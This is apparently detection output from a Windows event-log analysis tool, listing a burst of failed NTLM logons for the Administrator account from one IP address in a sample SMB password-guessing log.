+2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXZUhLVsfRUBDcsu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VEDAtkhiSqUcLj2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4CmH02M91kHzeK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5St1kWrKP4PZlOIy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17A6k4Om84gunQfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9GfR4XdixrNJHny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 27JWPfEV4DgS1tNv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yNeJnXg1pyedSpqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WWihv14n9IAQXw2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gy19bFWzQFaQZRBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N28Ec4jkXkSNvsQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sD9qQWJbeukyPQbc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uoRSHXvwMeKg8cyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPEOhloL7vo1fTFQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: glbLglffka5JqQCN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7MTbgvYN6PIaKxeK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAjWfgmGrm3o2mAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9EZYPG6uQtsez1UI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PRcnsdLAKd7enemG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUZEQaUavv7fWk4w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JKth56VEMqMCgwG9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TCGlvOFFkVpSHSoM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmLxSIastsvqdJC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPyvUDHHWzbhyvZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7dF4fIlAvIBYiw0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPDPtH2m9TgW8Khg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AChGHCNom0ds5ujV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8sLQI4KGgQRq2Sy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dqeLFLRT5EXiCBUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dx3tco9up7XnOa7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZdNX4ubtpQaV9EeF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S05I0ZlGKGazkVkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzbfrYSYhxH6WcCt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGTvXs8Mlc0Fi7iT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1LjtTFjPfPlBqAi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lhJW3iO1xGGTMhp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMz7WmlBTgadVgN8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OB02epCA5pc5oBeJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KAFgReUMtu9VerRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ByeL26yQfohpQT3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 527r3nh9ocmItXfL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNeC1BBFVXv839Ys | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: juXXpQcoPfJLMQ3L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: njNdv4lGnsUpooCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j6VchLhWJT7cCWVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r3xxnFpbd8zkFm0h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtf156NEpOebQHGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17O1jfGX6KQMPgnD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NaqTqrCiPPfNxZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Az7cwIWXUGVIMTv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Djaxf99PVs2VkMy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbTSoTdaQ0Y4c9Gw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g9aTo4QBHfrgPYZ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dpHKjYzZTn0ruIrf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HqhPnV6tc8airRqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RIOCqtXh5ji12U5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwuGZ0kgg1yToLlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZSBbd4qBRuzeKBjD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zS1Muxc9gpcqv23 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c6wiIkfkgtso42P1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1ilRmhSB5RfvpVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PuQ47GGBraimypWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UfUsAYWilbwMScpE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22ZSltGNwIl0DNDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IYwG9IUpdk5DmM8w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a8kbGxQFHDBodGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KoLqIaO8p3k9kOkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUnonSx3ZBdkyGhu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1QJziwKhsaJljGV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZhcNRrpODYB9jZxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yi5JE53caVn7n54w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jx6qTASzFp830ud6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4L8HtBWlmAMTjCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4hVfTwibHreepku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
